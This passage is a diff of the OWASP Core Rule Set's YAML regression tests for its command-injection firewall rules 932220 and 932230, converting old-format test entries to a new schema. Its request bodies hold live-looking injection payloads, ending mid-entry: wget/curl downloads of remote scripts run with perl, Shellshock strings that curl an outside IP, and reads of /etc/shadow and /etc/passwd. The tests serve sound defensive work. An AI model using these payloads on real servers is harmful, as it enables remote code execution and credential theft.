headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "whxami|sh+``" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "whxami|sh+``" + version: HTTP/1.0 + output: + log_contains: id "932220" + - test_id: 4 desc: "whxami|fish+``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "whxami|fish+``" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "whxami|fish+``" + version: HTTP/1.0 + output: + log_contains: id "932220" + - test_id: 5 desc: "Negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "echo | curx" - version: HTTP/1.0 - output: - no_log_contains: id "932220" - - test_title: 932220-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "echo | curx" + version: HTTP/1.0 + output: + no_log_contains: id "932220" + - test_id: 6 desc: | Test for BB finding 9P5LL13Y echo "foo;whxam"i | tr x o | sh #" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - uri: "/post" - port: 80 - data: | - echo "foo;whxam"i | tr x o | sh #" - version: HTTP/1.1 - output: - log_contains: id "932220" - - test_title: 932220-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + uri: "/post" + port: 80 + data: | + echo "foo;whxam"i | tr x o | sh #" + version: HTTP/1.1 + output: + log_contains: id "932220" + - test_id: 7 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cat<<, Franziska Bühler, Felipe Zipitria, Max Leske, Esad Cetiner, Xhoenix, azurit" - description: "Old tests and tests for fix of 932230 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886. \nIf you need to trigger tests on a command, use one of the three letter commands in the file included by the 932230 data rule.\n" - enabled: true - name: 932230.yaml + description: | + Old tests and tests for fix of 932230 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886. + If you need to trigger tests on a command, use one of the three letter commands in the file included by the 932230 data rule. tests: - - test_title: 932230-1 + - test_id: 1 desc: System Command Injection (932230) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 2 desc: System Command Injection (932230) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 3 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+true+positive+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+true+positive+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 4 desc: Like 932230-3 but instead of space sign using new line sign stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.%0D%0AThis+is+the+new+line.+After+it+more+characters%0D%0AAnd+the+3rd+line+goes+here" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.%0D%0AThis+is+the+new+line.+After+it+more+characters%0D%0AAnd+the+3rd+line+goes+here" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 5 desc: Another html entity - decimal 9977 (person with ball) with space sign after entity and dot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Another+entity+and+the+dot+after+it+and+space+%26%239977%3B.+and+more." - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Another+entity+and+the+dot+after+it+and+space+%26%239977%3B.+and+more." + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 6 desc: Another html entity - decimal 128 (euro) with new line sign after entity and dot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Euro+entity+%26%238364%3B.%0D%0Aand+the+new+line+after+entity+and+dot" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Euro+entity+%26%238364%3B.%0D%0Aand+the+new+line+after+entity+and+dot" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 7 desc: arg value of ";ifconfig Something „The Title”. After space or new line more characters" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 8 desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 9 desc: Positive test - RCE passed in one of the args stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: | - arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: | + arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 10 desc: RCE from test 932230.yaml combined with html entities in the middle stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 11 desc: RCE from test 932230.yaml combined with html entities at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 12 desc: RCE from test 932230.yaml combined with html entities at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 13 desc: RCE from https://github.com/payloadbox/command-injection-payload-list and html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=()+{+:;};+/bin/sh+-c+\"sleep+6+&&+echo+vulnerable+6\"" - version: HTTP/1.1 - output: - log_contains: id "932230" - - test_title: 932230-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=()+{+:;};+/bin/sh+-c+\"sleep+6+&&+echo+vulnerable+6\"" + version: HTTP/1.1 + output: + log_contains: id "932230" + - test_id: 14 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 15 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 16 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 17 desc: RCE ;top with html entities two digit decimal of 59 (;) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%26%2359%3B+;top" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 